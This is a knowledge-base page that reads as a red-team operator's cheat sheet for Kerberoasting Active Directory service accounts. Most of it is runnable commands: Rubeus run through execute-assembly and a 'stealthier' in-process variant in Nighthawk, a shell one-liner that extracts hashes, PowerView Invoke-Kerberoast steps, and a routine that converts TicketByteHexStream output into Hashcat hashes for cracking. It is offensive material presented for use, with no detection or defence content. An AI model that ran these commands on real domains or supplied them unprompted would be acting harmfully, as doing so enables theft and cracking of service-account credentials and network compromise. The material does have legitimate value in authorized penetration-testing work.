Antisyphon KB

Kerberoasting and Fixing Kerberoasting Errors (Invoke-Kerberoast, Get-KerberoastHashFromAPReq, TicketByteHexStream)

Nov 04, 20242 min read

.Net - Rubeus

execute-assembly /pipe/ANY/4.5/Rubeus.exe kerberoast /outfile:C:\Users\allem\Desktop\08-30_1606_spns.txt

Stealthier version with inproc-execute-assembly in Nighthawk:

  • Outputs to console only, so run clear first and then CTRL+A to select all and copy afterward to collect hashes.
clear

inproc-execute-assembly --no-amsi-patch --no-etw-patch C:\pipe\Rubeus\x64\4.5\Rubeus.exe kerberoast
  • One-liner to extract SPNs from the copy/pasted console output saved (as output.txt) from the command above:
cat output.txt | dos2unix | sed -E 's/^[[:space:]]*//g' | tr -d '\r' | tr -d '\n' | sed -E 's/\[[^]]+\]/\n\[X\]/g' | grep -E '\[X\] Hash' | sed -E 's/^\[X\] Hash[^:]*: //g' | sort -u

PowerView Invoke-Kerberoast: Error-resilient method

  1. Collect the SPN data in “SPNs-RAW.csv”. This way you don’t have to kerberoast TWICE if the hashes aren’t immediately available.
Invoke-Kerberoast -OutputFormat Hashcat | convertto-csv | Out-File -Encoding ascii 'SPNs-RAW.csv'
  1. Load the CSV data back into PowerShell for parsing. All of the remaining steps can be done OFFLINE if desired.
$spn_data = ( get-content .\SPNs-RAW.csv | ConvertFrom-Csv )
  1. If no errors were received during the first step, just extract the hashes from the data as normal:
$spn_data | foreach { echo $_.Hash } | Add-Content -encoding ascii -passthru 'spn_hashes.txt'

Fixing hashes/errors (if needed)

If you received this error when running the first command: - “WARNING: Unable to parse ticket structure for the SPN <…>. Use theTicketByteHexStream field and extract the hash offline with Get-KerberoastHashFromAPReq” - Or if you have “TicketByteHexStream” data instead of “Hash” data/fields in your output

  1. Import this module to get Get-KerberoastHashFromAPReq: https://raw.githubusercontent.com/leechristensen/Random/master/PowerShellScripts/Get-KerberoastingHash.ps1

  2. Run this command. It will output two files:

    • “spn_hashes_fixed.full_output.txt” - Contains all the fields so you can match usernames to hashes after cracking.
    • “spn_hashes_fixed.hashes” - Contains only the hashes, for cracking with Hashcat.
( $spn_data | foreach {  echo $_.SamAccountName ; echo $_.DistinguishedName ; echo $_.ServicePrincipalName ; ( Get-KerberoastHashFromAPReq -Hash $_.TicketByteHexStream -HashFormat Hashcat | Add-Content -encoding ascii -passthru 'spn_hashes_fixed.hashes' ) ; echo "-------" } ) | set-content 'spn_hashes_fixed.full_output.txt' -passthru

Graph View

Backlinks